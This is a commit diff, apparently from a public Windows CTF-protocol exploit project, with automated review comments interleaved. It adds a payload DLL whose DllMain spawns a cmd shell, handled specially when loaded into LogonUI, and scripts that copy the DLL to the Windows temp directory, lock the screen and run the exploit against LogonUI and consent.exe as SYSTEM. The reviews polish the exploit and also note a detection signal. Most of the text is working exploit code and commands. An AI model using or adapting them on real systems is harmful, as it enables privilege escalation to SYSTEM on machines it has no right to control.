
improve logonui exploit

taviso committed Jun 26, 2019
1 parent da57c38 commit 1de22b02f0a004cd8a90fba8ea90e643bbe0ce77
Showing with 36 additions and 4 deletions.
  1. +16 −0 payload.c
  2. +4 −0 scripts/ctf-consent-system.ctf
  3. +16 −4 scripts/ctf-logonui-system.ctf
@@ -5,18 +5,34 @@
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
CHAR Command[] = "cmd";
CHAR ModulePath[MAX_PATH];
CHAR ModuleName[MAX_PATH];
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&ModulePath, sizeof(ModulePath));
ZeroMemory(&ModuleName, sizeof(ModuleName));
si.cb = sizeof si;

// Learn what process we've loaded into, in case we need it.
if (GetModuleFileNameA(NULL, ModulePath, sizeof ModulePath)) {
_splitpath(ModulePath, NULL, NULL, ModuleName, NULL);
}

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
// attach to process
if (CreateProcess(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {

// LogonUI acts strangely if we try to ExitProcess()
if (stricmp(ModuleName, "LOGONUI") == 0) {
WaitForSingleObject(pi.hProcess, INFINITE);
TerminateProcess(GetCurrentProcess(), 0);
}

CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
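Review bot: The GetModuleFileNameA call on the `if (GetModuleFileNameA(...))` line is treated as success whenever it returns nonzero, but it also returns nonzero when the path was truncated to the MAX_PATH buffer and sets ERROR_INSUFFICIENT_BUFFER, so ModuleName could be derived from a clipped path and the `stricmp(ModuleName, "LOGONUI")` test would silently not match; `if (GetModuleFileNameA(NULL, ModulePath, sizeof ModulePath) && GetLastError() != ERROR_INSUFFICIENT_BUFFER)` states the intent. `stricmp` is the legacy POSIX-compat spelling; the documented CRT name is `_stricmp`. For anyone writing detections around this proof of concept, the observable artifact is cmd.exe created as a direct child of the host process, and for LogonUI.exe (and presumably consent.exe, per the sibling script) that parent/child pairing is anomalous and worth alerting on. DllMain's else branch and the remaining switch cases continue past the hunk.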
@@ -50,3 +50,7 @@ print consent.exe has joined the session, starting exploit...

# Now that we're connected and have a target selected, load the exploit script.
script scripts\ctf-exploit-common-1903.ctf

print
print Exploit complete.
print
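Review bot: `print Exploit complete.` is emitted unconditionally after the `script` line, so the run reports success even if scripts\ctf-exploit-common-1903.ctf failed; the same trailing block is added at the end of scripts/ctf-logonui-system.ctf. If the script directive sets `rc` the way the copy step does in the logonui script, guarding the message with `repeat rc print ...` would let it reflect the outcome; otherwise a neutral wording such as `print Exploit script finished, check the output above for errors.` avoids overstating the result. The script this hunk belongs to starts outside the hunk.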
@@ -2,10 +2,17 @@
# switching to the Winlogon Desktop, and then exploiting the login screen
# via the CTF session.

print
print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
print Attempting to copy exploit payload...

# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL

# Print a warning if that didnt work.
repeat rc print
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print
print
print The screen will lock to trigger the login screen in 5 seconds...

@@ -26,3 +33,8 @@ wait LogonUI.exe

# Now that we're connected and have a target selected, load the exploit script.
script scripts\ctf-exploit-common-1903.ctf

print
print Exploit complete.
print
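Review bot: The new warning banner and the comment on the `# This exploit runs LoadLibraryA(...)` line name a fixed C:\WINDOWS\TEMP\EXPLOIT.DLL path, while the copy on the `run CMD /C COPY ...` line targets %SYSTEMROOT%\TEMP, so the two disagree on systems where SYSTEMROOT is not C:\WINDOWS; printing %SYSTEMROOT%\TEMP\EXPLOIT.DLL in the messages would keep them consistent, assuming the ctf `print` directive expands environment variables (if it does not, the comment should say the banner assumes the default install location). The comment `# Print a warning if that didnt work.` has a typo, `didn't`. The `repeat rc` lines only print a warning and the script appears to continue to the screen lock five seconds later, which is worth stating in that comment so a reader knows a failed copy is not treated as fatal here.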
